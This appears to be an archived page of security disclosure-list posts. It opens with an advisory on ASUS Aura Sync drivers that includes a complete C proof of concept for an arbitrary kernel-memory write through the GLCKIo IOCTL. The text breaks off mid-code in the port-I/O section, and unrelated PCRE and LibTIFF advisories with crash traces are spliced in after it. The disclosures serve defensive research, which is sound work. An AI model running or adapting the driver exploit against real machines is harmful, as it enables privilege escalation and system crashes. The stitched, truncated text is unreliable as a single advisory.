SecureAuth Advisories Team.

*7. Technical Description / Proof of Concept Code*

Aura Sync is ASUS's command software for all their line of recent RGB
lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).

The main subjects of this advisory are two of the device drivers
installed/loaded by the Aura Sync application, from now on addressed as
"Asusgio" and "GLCKIo". The default installation allows non-privileged user
processes (even running at LOW INTEGRITY) to get a HANDLE and issue
IOCTL codes to these drivers.

The following sections describe the problems found.

*7.1. Arbitrary ring0 write*

[CVE-2018-18537]
There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)
on GLCKIo leading to write of arbitrary DWORD to an arbitrary address.

/-
.text:F800B09F13FE loc_F800B09F13FE:
.text:F800B09F13FE mov rax, [rsp+0C8h+var_38]  ; CONTROLLED VALUE
.text:F800B09F1406 mov ecx, [rsp+0C8h+var_56]  ; CONTROLLED VALUE
.text:F800B09F140A mov [rax], ecx               ; Arbitrary DWORD sized write!
.text:F800B09F140C mov rax, [rsp+0C8h+Irp]
.text:F800B09F1414 mov qword ptr [rax+38h], 4
.text:F800B09F141C jmp short loc_F800B09F142D
-/

Proof of Concept:
/-
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>

HANDLE ghDriver = 0;

#define IOCTL_GLCKIO_VMWRITE 0x80102050

// Input/output buffer layout for IOCTL 0x80102050; field names reflect what is
// known from the disassembly (unk1_1 carries the value, unk5 the address)
typedef struct _STRUCT_GLCKIO_VMWRITE {
    WORD unk0;
    DWORD unk1_1;
    WORD unk1_2;
    ULONG64 unk2;
    ULONG64 unk3;
    ULONG64 unk4;
    ULONG64 unk5;
    ULONG64 unk6;
} STRUCT_GLCKIO_VMWRITE;

BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)
{
    STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };
    mystructIn.unk0 = 0xf11;
    mystructIn.unk1_1 = value;    // value
    mystructIn.unk5 = dest;       // address

    STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };

    DWORD returned = 0;

    DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
        sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut),
        &returned, NULL);
    return (BOOL)(returned != 0);
}

BOOL InitDriver()
{
    // Device object exposed by GLCKIo; opened with a plain user-mode handle
    ghDriver = CreateFileA("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to GLCKIo driver - GetLastError:%lu\n",
            GetLastError());
        return FALSE;
    }
    return TRUE;
}

int _tmain(int argc, _TCHAR* argv[])
{
    printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");

    if (!InitDriver()) {
        exit(0);
    }

    printf("press ENTER for instant BSOD\n");
    getchar();
    /* the original constant was lost in the archived copy; the write to
       address 0 crashes regardless of the value */
    ArbitraryWriteDWORD(0, 0x0);

    CloseHandle(ghDriver);
    return 0;
}
-/

*7.2. Port mapped I/O access*

[CVE-2018-18536]
Both GLCKIo and Asusgio expose a functionality to read/write data
from/to IO ports. This could be leveraged in a number of ways to
ultimately run code with elevated privileges.

/-
// This harmless PoC only reboots the PC, much more sinister stuff
// would also be possible by abusing this 

[FD] Buffer Overflow in function match() PCRE 8.41 (CVE-2017-16231)

2018-12-21 Thread zzt0907
# Buffer Overflow in function match() PCRE 8.41 (CVE-2017-16231)
## Product Download: https://sourceforge.net/projects/pcre/files/pcre/
## Vulnerability Type: Buffer Overflow
## Attack Type: local
## Vulnerability Description
A pcretest load test PoC produces a crash (overflow) in the function match() in
pcre_exec.c because of a self-recursive call.
> file: pcre_exec.c
> function match(), line 983 and line 2061
## POC
https://github.com/followboy1999/poc/tree/master/CVE-2017-16231
./pcretest pcre_poc.txt
## Versions: PCRE 8.41
## Impact: Denial of Service
## Credit
This vulnerability was discovered by Jiawang Zhang, Coordination Center of China
(CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16231


[FD] LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)

2018-12-21 Thread zzt0907
# CVE-2017-16232
# LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)
## Product Download: http://www.libtiff.org/ http://download.osgeo.org/libtiff/
## Vulnerability Type: memory leak
## Attack Type: local
## Vulnerability Description
LibTIFF 4.0.8 has multiple memory leak vulnerabilities, which allow
attackers to cause a denial of service (memory consumption), as demonstrated
by tif_open.c, tif_lzw.c, and tif_aux.c
## POC
https://github.com/followboy1999/poc/tree/master/CVE-2017-16232

./tiff2bw libtiff_poc.tif 222.tif
 LZWDecode: Not enough data at scanline 0 (short 6442443006 bytes).
> /usr/local/bin/llvm-symbolizer: /lib/x86_64-linux-gnu/libtinfo.so.5: no 
> version information available (required by /usr/local/bin/llvm-symbolizer)
> 
> =
> ==25328==ERROR: LeakSanitizer: detected memory leaks
> 
> Direct leak of 6442451106 byte(s) in 1 object(s) allocated from:
> #0 0x4bbfd3 in __interceptor_malloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:67:3
> #1 0x4e88be in main 
> /home/zzt/Fuzzing/Victims/ASAN/tiff-4.0.8/tools/tiff2bw.c:258:28
> #2 0x7f293f0fdabf in __libc_start_main 
> /build/glibc-qbmteM/glibc-2.21/csu/libc-start.c:289
> 
> Direct leak of 1137 byte(s) in 1 object(s) allocated from:
> #0 0x4bbfd3 in __interceptor_malloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:67:3
> #1 0x54d6b6 in TIFFClientOpen 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_open.c:119
> 
> Indirect leak of 81904 byte(s) in 1 object(s) allocated from:
> #0 0x4bbfd3 in __interceptor_malloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:67:3
> #1 0x5ea2e9 in LZWSetupDecode 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_lzw.c:232
> 
> Indirect leak of 2273 byte(s) in 5 object(s) allocated from:
> #0 0x4bc3d7 in realloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:98:3
> #1 0x56f5db in _TIFFCheckRealloc 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_aux.c:73
> #2 0x56f5db in _TIFFCheckMalloc 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_aux.c:88
> 
> Indirect leak of 1240 byte(s) in 2 object(s) allocated from:
> #0 0x4bc3d7 in realloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:98:3
> #1 0x56f430 in _TIFFCheckRealloc 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_aux.c:73

## Versions: LibTIFF 4.0.8
## Impact: Denial of Service
## Credit
This vulnerability was discovered by Jiawang Zhang, Coordination Center of China
(CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16232
https://github.com/shelltdf/libtiff/commit/25f9ffa56548c1846c4a1f19308b7f561f7b1ab0
